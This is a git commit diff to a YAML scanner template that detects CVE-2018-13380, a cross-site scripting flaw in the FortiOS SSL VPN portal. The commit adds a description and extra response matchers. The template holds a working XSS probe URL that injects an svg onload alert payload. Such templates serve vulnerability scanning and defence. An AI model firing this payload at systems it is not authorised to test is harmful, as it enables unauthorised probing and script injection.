adding more info and matchers

2020-11-25 01:30:01 +05:30 · 2020-11-25 01:30:01 +05:30 · 6f3b2cdd0c
parent b81c8ea57d
commit 6f3b2cdd0c
1 changed files with 15 additions and 0 deletions
--- a/cves/CVE-2018-13380.yaml
+++ b/cves/CVE-2018-13380.yaml
@ -4,13 +4,28 @@ info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v
  severity: medium
+  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
+  type: XSS
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23<svg/onload=alert(1337)>"
+
+    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
        part: body
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+        negative: true
+
+      - type: status
+        status:
+          - 200